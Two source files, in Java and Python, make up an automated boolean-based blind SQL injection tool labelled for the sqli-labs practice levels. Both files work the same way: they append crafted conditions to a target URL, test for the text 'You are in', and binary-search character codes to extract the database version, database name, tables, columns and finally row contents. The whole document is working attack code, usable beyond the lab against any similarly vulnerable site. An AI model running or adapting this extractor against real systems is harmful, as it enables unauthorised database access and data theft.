File: BoolInjection/BoolInjection.java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Scanner;

public class BoolInjection {
    private static final String USER_AGENT = "Mozilla/5.0";
    static Scanner scanner = new Scanner(System.in);
    private static String url;

    private static String database;
    private static String table;

    public static void main(String[] args) throws Exception {
        System.out.println("代码仅用于sqli-labs关卡");
        System.out.print("闭合后的URL:");
        url = scanner.nextLine();

        version();
        int len = dbLen();
        dbName(len);
        int tableNum = countTables();
        dbTable(tableNum);

    }

    // 发起Http请求并返回网页源码
    private static String getResponse(String payload) throws Exception {

        URL url = new URL(payload);

        HttpURLConnection connection = (HttpURLConnection) url.openConnection();
        connection.setRequestMethod("GET");
        connection.setRequestProperty("User-Agent", USER_AGENT);

        if (connection.getResponseCode() == 200) {
            BufferedReader reader = new BufferedReader(new InputStreamReader(connection.getInputStream()));
            String line;
            StringBuilder response = new StringBuilder();
            while ((line = reader.readLine()) != null) {
                response.append(line);
            }
            reader.close();

            connection.disconnect();

            return response.toString();
        } else {
            throw new IOException("连接失败");
        }

    }


    // 获取数据库版本
    private static void version() throws Exception {
        StringBuilder ver = new StringBuilder();
        for (int i = 1; i <= 6; i++) {
            for (int j = 0; j < 100; j++) {
                String payload = url + "+and+mid(version()," + i + ",1)=" + j + "+--+";
                String response = getResponse(payload);

                if (response.contains("You are in")) {
                    ver.append(j);
                    break;
                }
            }
        }
        ver = new StringBuilder(ver.toString().replace("0", "."));
        System.out.println("数据库版本为：" + ver);
    }

    // 获取数据库长度
    private static int dbLen() throws Exception {
        int len = 0;
        for (int i = 1; i <= 20; i++) {
            String payload = url + "+and+length(database())=" + i + ";+--+";
            String response = getResponse(payload);

            if (response.contains("You are in")) {
                len = i;
                break;
            }
        }
        return len;
    }


    // 获取数据库名称
    private static void dbName(int len) throws Exception {
        StringBuilder dbName = new StringBuilder();
        for (int i = 1; i <= len; i++) {
            int left = 32, right = 126;
            while (left <= right) {
                int mid = left + ((right - left) >> 1);
                String payload = url + "+and+ascii(substring(database()," + i + ",1))>" + mid + "+--+";
                String response = getResponse(payload);
                if (response.contains("You are in")) {
                    left = mid + 1;
                    continue;
                }

                payload = url + "+and+ascii(substring(database()," + i + ",1))<" + mid + "+--+";
                response = getResponse(payload);
                if (response.contains("You are in")) {
                    right = mid - 1;
                    continue;
                }

                payload = url + "+and+ascii(substring(database()," + i + ",1))=" + mid + "+--+";
                response = getResponse(payload);
                if (response.contains("You are in")) {
                    dbName.append((char) mid);
                    break;
                }
            }
        }
        database = dbName.toString();
        System.out.println("数据库名称：" + database);
    }

    // 数据库中表的数量
    private static int countTables() throws Exception {
        int i = 0;

        while (true) {
            String payload = url + "+and+(SELECT+COUNT(*)+FROM+information_schema.tables+WHERE+table_schema=database())=" + i + "+--+";
            String response = getResponse(payload);

            if (response.contains("You are in")) {
                return i;
            } else {
                i++;
            }
        }
    }

    // 表名
    private static void dbTable(int tableNum) throws Exception {
        StringBuilder tableName = new StringBuilder();
        for (int j = 0; j < tableNum; j++) {
            boolean flag = true;
            int i = 1;
            while (flag) {
                int left = 32;
                int right = 126;

                while (left <= right) {
                    int mid = left + ((right - left) >> 1);
                    String payload = url + "+and+ascii(substr((select+table_name+from+information_schema.tables+"
                            + "where+table_schema=database()+limit+" + j + ",1)," + i + ",1))=0--+";
                    String response = getResponse(payload);

                    if (response.contains("You are in")) {
                        flag = false;
                        tableName.append(",");
                        break;
                    }

                    payload = url + "+and+ascii(substr((select+table_name+from+information_schema.tables+"
                            + "where+table_schema=database()+limit+" + j + ",1)," + i + ",1))>" + mid + "--+";
                    response = getResponse(payload);

                    if (response.contains("You are in")) {
                        left = mid + 1;
                        continue;
                    }

                    payload = url + "+and+ascii(substr((select+table_name+from+information_schema.tables+"
                            + "where+table_schema=database()+limit+" + j + ",1)," + i + ",1))<" + mid + "--+";
                    response = getResponse(payload);

                    if (response.contains("You are in")) {
                        right = mid - 1;
                        continue;
                    }

                    payload = url + "+and+ascii(substr((select+table_name+from+information_schema.tables+"
                            + "where+table_schema=database()+limit+" + j + ",1)," + i + ",1))=" + mid + "--+";
                    response = getResponse(payload);

                    if (response.contains("You are in")) {
                        tableName.append((char) mid);
                        i += 1;
                    }

                }
            }
        }
        String[] tableList = tableName.toString().split(",");
        HashMap<Integer, String> tableMap = new HashMap<>();
        for (int i = 0; i < tableList.length; i++) {
            tableMap.put(i, tableList[i]);
        }

        System.out.println(tableMap);
        int index = scanner.nextInt();
        table = tableMap.get(index);
        getColumns();

    }

    // 获取字段数
    private static void getColumns() throws Exception {
        int index = 0;
        StringBuilder columnNames = new StringBuilder();
        while (true) {
            String payload = url + String.format("+and+(SELECT+COUNT(*)+FROM+information_schema.COLUMNS+WHERE+table_schema=DATABASE()+AND+table_name='%s')=%d+--+", table, index);
            String response = getResponse(payload);
            if (response.contains("You are in")) {
                break;
            } else {
                index++;
            }
        }

        for (int i = 0; i < index; i++) {
            boolean flag = true;
            int j = 1;
            while (flag) {
                int left = 32;
                int right = 126;
                while (left <= right) {
                    int mid = left + ((right - left) >> 1);

                    String payload = url + String.format("+and+ascii(substr((select+column_name+from+information_schema.COLUMNS+where+table_schema=database()+and+table_name='%s'+limit+%s,1),%s,1))=0+--+", table, i, j);
                    String response = getResponse(payload);

                    if (response.contains("You are in")) {
                        flag = false;
                        columnNames.append(",");
                        break;
                    }

                    payload = url + String.format("+and+ascii(substr((select+column_name+from+information_schema.COLUMNS+where+table_schema=database()+and+table_name='%s'+limit+%s,1),%s,1))>%d+--+", table, i, j, mid);
                    response = getResponse(payload);
                    if (response.contains("You are in")) {
                        left = mid + 1;
                        continue;
                    }

                    payload = url + String.format("+and+ascii(substr((select+column_name+from+information_schema.COLUMNS+where+table_schema=database()+and+table_name='%s'+limit+%s,1),%s,1))<%d+--+", table, i, j, mid);
                    response = getResponse(payload);
                    if (response.contains("You are in")) {
                        right = mid - 1;
                        continue;
                    }

                    payload = url + String.format("+and+ascii(substr((select+column_name+from+information_schema.COLUMNS+where+table_schema=database()+and+table_name='%s'+limit+%s,1),%s,1))=%d+--+", table, i, j, mid);
                    response = getResponse(payload);
                    if (response.contains("You are in")) {
                        columnNames.append((char) mid);
                        j++;
                    }
                }
            }
        }
        String[] columnList = columnNames.toString().split(",");
        HashMap<Integer, String> columnMap = new HashMap<>();
        for (int i = 0; i < columnList.length; i++) {
            columnMap.put(i, columnList[i]);
        }
        System.out.println(columnMap);
        System.out.println("选择多个以空格分开");

        Scanner scanner = new Scanner(System.in);
        String str = scanner.nextLine();

        String[] strings = str.split(" ");

        int[] num = new int[strings.length];

        for (int i = 0; i < strings.length; i++) {
            num[i] = Integer.parseInt(String.valueOf(strings[i]));
        }
        ArrayList<String> queryColumn = new ArrayList<>();
        for (int i : num) {
            queryColumn.add(columnList[i]);
        }
        getData(queryColumn);
    }

    private static void getData(ArrayList<String> queryColumn) throws Exception {
        //+and+ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68+--+
        int dataCount = 0;
        for (String s : queryColumn) {
            String payload = url + "+AND+(SELECT+COUNT(" + s + ")+FROM+" + database + "." + table + ")=" + dataCount + "+--+";
            String response = getResponse(payload);

            while (!response.contains("You are in")) {
                dataCount++;
                payload = url + "+AND+(SELECT+COUNT(" + s + ")+FROM+" + database + "." + table + ")=" + dataCount + "+--+";
                response = getResponse(payload);
            }
        }


        for (String s : queryColumn) {
            StringBuilder data = new StringBuilder();
            for (int i = 0; i < dataCount; i++) {
                int j = 1;
                boolean flag = true;
                while (flag) {
                    int left = 32, right = 126;

                    while (left <= right) {
                        int mid = left + ((right - left) >> 1);

                        String payload = url + String.format("+and+ORD(MID((SELECT+IFNULL(CAST(%s+AS+CHAR),0x20)FROM+%s.%s+ORDER+BY+id+LIMIT+%d,1),%d,1))=0+--+", s, database, table, i, j);
                        String response = getResponse(payload);

                        if (response.contains("You are in")) {
                            data.append(",");
                            flag = false;
                            break;
                        }

                        payload = url + String.format("+and+ORD(MID((SELECT+IFNULL(CAST(%s+AS+CHAR),0x20)FROM+%s.%s+ORDER+BY+id+LIMIT+%d,1),%d,1))>%d+--+", s, database, table, i, j, mid);
                        response = getResponse(payload);
                        if (response.contains("You are in")) {
                            left = mid + 1;
                            continue;
                        }

                        payload = url + String.format("+and+ORD(MID((SELECT+IFNULL(CAST(%s+AS+CHAR),0x20)FROM+%s.%s+ORDER+BY+id+LIMIT+%d,1),%d,1))<%d+--+", s, database, table, i, j, mid);
                        response = getResponse(payload);
                        if (response.contains("You are in")) {
                            right = mid - 1;
                            continue;
                        }

                        payload = url + String.format("+and+ORD(MID((SELECT+IFNULL(CAST(%s+AS+CHAR),0x20)FROM+%s.%s+ORDER+BY+id+LIMIT+%d,1),%d,1))=%d+--+", s, database, table, i, j, mid);
                        response = getResponse(payload);
                        if (response.contains("You are in")) {
                            data.append((char) mid);
                            j++;

                        }
                    }
                }
            }
            data.deleteCharAt(data.length() - 1);
            String[] columnList = data.toString().split(",");
            HashMap<Integer, String> dataMap = new HashMap<>();
            for (int i = 0; i < columnList.length; i++) {
                dataMap.put(i, columnList[i]);
            }
            System.out.print(s + ": ");
            System.out.println(dataMap);
        }
    }
}

File: BoolInjection/BoolInjection.py
import requests
import argparse

parser = argparse.ArgumentParser(usage="代码仅用于sqli-labs关卡")


class BoolInjection:
    def __init__(self, url: str) -> None:
        self.url = url
        self.len = 0
        self.ver = ''
        self.name = ''
        self.table_name = ''
        self.columns = []
        self.version()
        self.db_len()
        self.db_name()
        print(f"数据库：{self.name}")
        self.db_table()
        print(f"表名：{self.table_name}")
        self.db_column()

    def version(self):
        for i in range(1, 7):
            for j in range(100):
                payload = f" and mid(version(),{i},1)={j} --+"
                url = self.url + payload
                response = requests.get(url)
                if response.status_code == 200 and b'You are in' in response.content:
                    self.ver += str(j)
                    break
        self.ver = self.ver.replace('0', '.')
        print(f"数据库版本为{self.ver}")

    def db_len(self):
        for i in range(1, 20):
            payload = f" and length(database())={i}; -- "
            url = self.url + payload
            response = requests.get(url)
            if response.status_code == 200 and b'You are in' in response.content:
                self.len = i
                break
        print(f"数据库名长度为{self.len}")

    def db_name(self):
        for i in range(1, self.len + 1):
            left, right = 32, 126
            while left <= right:
                mid = left + ((right - left) >> 1)
                payload = f" and ascii(substring(database(),{i},1))>{mid} -- "
                url = self.url + payload
                response = requests.get(url)
                if response.status_code == 200 and b'You are in' in response.content:
                    left = mid + 1
                    continue
                payload = f" and ascii(substring(database(),{i},1))<{mid} -- "
                url = self.url + payload
                response = requests.get(url)
                if response.status_code == 200 and b'You are in' in response.content:
                    right = mid - 1
                    continue
                payload = f" and ascii(substring(database(),{i},1))={mid} -- "
                url = self.url + payload
                response = requests.get(url)
                if response.status_code == 200 and b'You are in' in response.content:
                    self.name += chr(mid)
                    i += 1
                    continue

    def db_table(self):
        num = 0
        while True:
            payload = self.url + f" and (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())={num} --+ "
            response = requests.get(payload)

            if b'You are in' in response.content:
                break
            else:
                num += 1
        for j in range(num):
            flash = True
            i = 1
            while flash:
                left, right = 32, 126
                while left <= right:
                    mid = left + ((right - left) >> 1)

                    payload = f" and ascii(substr((select table_name from information_schema.tables\
                                where table_schema=database() limit {j},1),{i},1))=0--+"
                    url = self.url + payload
                    response = requests.get(url)
                    if response.status_code == 200 and b'You are in' in response.content:
                        flash = False
                        self.table_name += ','
                        break

                    payload = f" and ascii(substr((select table_name from information_schema.tables\
                                where table_schema=database() limit {j},1),{i},1))>{mid}--+"
                    url = self.url + payload
                    response = requests.get(url)
                    if response.status_code == 200 and b'You are in' in response.content:
                        left = mid + 1
                        continue
                    payload = f" and ascii(substr((select table_name from information_schema.tables\
                            where table_schema=database() limit {j},1),{i},1))<{mid}--+"
                    url = self.url + payload
                    response = requests.get(url)
                    if response.status_code == 200 and b'You are in' in response.content:
                        right = mid - 1
                        continue
                    payload = f" and ascii(substr((select table_name from information_schema.tables\
                            where table_schema=database() limit {j},1),{i},1))={mid}--+"
                    url = self.url + payload
                    response = requests.get(url)
                    if response.status_code == 200 and b'You are in' in response.content:
                        self.table_name += chr(mid)
                        i += 1
                        continue

        table_list = self.table_name.split(',')
        table_list.pop()
        table_dist = {}
        for i in range(len(table_list)):
            table_dist[i] = table_list[i]
        print(f'current-tables: {table_dist}', )
        table_num = int(input('请选择表:'))
        self.table_name = table_dist[table_num]

    def db_column(self):
        """
        and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),%d,1)))=ord('%s')
        :return:
        """
        num = 0
        columnNames = ''
        while True:
            payload = self.url + f" and (SELECT COUNT(*) FROM information_schema.COLUMNS WHERE table_schema=DATABASE(" \
                                 f") AND table_name='{self.table_name}')={num} --+"
            response = requests.get(payload)
            if b'You are in' in response.content:
                break
            else:
                num += 1
        for i in range(0, num):
            flag = True
            j = 1
            while flag:
                left, right = 32, 126
                while left <= right:
                    mid = left + ((right - left) >> 1)
                    payload = self.url + f" and ascii(substr((select column_name from information_schema.COLUMNS" \
                                         f" where table_schema=database() and table_name='{self.table_name}' limit {i},1),{j},1))=0 --+"
                    response = requests.get(payload)
                    if response.status_code == 200 and b'You are in' in response.content:
                        flag = False
                        columnNames += ','
                        break

                    payload = self.url + f" and ascii(substr((select column_name from information_schema.COLUMNS" \
                                         f" where table_schema=database() and table_name='{self.table_name}' limit {i},1),{j},1))>{mid} --+"
                    response = requests.get(payload)
                    if response.status_code == 200 and b'You are in' in response.content:
                        left = mid + 1
                        continue

                    payload = self.url + f" and ascii(substr((select column_name from information_schema.COLUMNS" \
                                         f" where table_schema=database() and table_name='{self.table_name}' limit {i},1),{j},1))<{mid} --+"
                    response = requests.get(payload)
                    if response.status_code == 200 and b'You are in' in response.content:
                        right = mid - 1
                        continue

                    payload = self.url + f" and ascii(substr((select column_name from information_schema.COLUMNS" \
                                         f" where table_schema=database() and table_name='{self.table_name}' limit {i},1),{j},1))={mid} --+"
                    response = requests.get(payload)
                    if b'You are in' in response.content:
                        columnNames += chr(mid)
                        j += 1
                        continue
        column_list = columnNames.split(",")
        column_list.pop()
        column_dict = {}

        for i in range(len(column_list)):
            column_dict[i] = column_list[i]
        print(f'current-columns: {column_dict}', )
        columns_num = input('请选择:').split(" ")
        for i in columns_num:
            self.columns.append(column_dict[int(i)])
        self.get_data()

    def get_data(self):
        datacount = 0
        for i in self.columns:
            payload = self.url + f" AND (SELECT COUNT({i}) FROM {self.name}.{self.table_name})={datacount} --+"
            response = requests.get(payload)

            while b'You are in' not in response.content:
                datacount += 1
                payload = self.url + f" AND (SELECT COUNT({i}) FROM {self.name}.{self.table_name})={datacount} --+"
                response = requests.get(payload)

        for s in self.columns:
            data = ''
            for i in range(datacount):
                j = 1
                flag = True
                while flag:
                    left, right = 32, 126
                    while left <= right:
                        mid = left + ((right - left) >> 1)
                        payload = self.url + f" and ORD(MID((SELECT IFNULL(CAST({s} AS CHAR),0x20)FROM {self.name}.{self.table_name} ORDER BY id LIMIT {i},1),{j},1))=0 --+"
                        response = requests.get(payload)
                        if response.status_code == 200 and b'You are in' in response.content:
                            flag = False
                            data += ','
                            break

                        payload = self.url + f" and ORD(MID((SELECT IFNULL(CAST({s} AS CHAR),0x20)FROM {self.name}.{self.table_name} ORDER BY id LIMIT {i},1),{j},1))>{mid} --+"
                        response = requests.get(payload)
                        if response.status_code == 200 and b'You are in' in response.content:
                            left = mid + 1
                            continue

                        payload = self.url + f" and ORD(MID((SELECT IFNULL(CAST({s} AS CHAR),0x20)FROM {self.name}.{self.table_name} ORDER BY id LIMIT {i},1),{j},1))<{mid} --+"
                        response = requests.get(payload)
                        if response.status_code == 200 and b'You are in' in response.content:
                            right = mid - 1
                            continue

                        payload = self.url + f" and ORD(MID((SELECT IFNULL(CAST({s} AS CHAR),0x20)FROM {self.name}.{self.table_name} ORDER BY id LIMIT {i},1),{j},1))={mid} --+"
                        response = requests.get(payload)
                        if b'You are in' in response.content:
                            data += chr(mid)
                            j += 1
                            continue
            data_list = data.split(",")
            data_list.pop()
            data_dict = {}

            for i in range(len(data_list)):
                data_dict[i] = data_list[i]
            print(f'{s}: {data_dict}')


if __name__ == '__main__':
    parser.add_argument('-u', '--url', type=str, metavar='', help='闭合后的URL')
    args = parser.parse_args()
    BoolInjection(args.url)
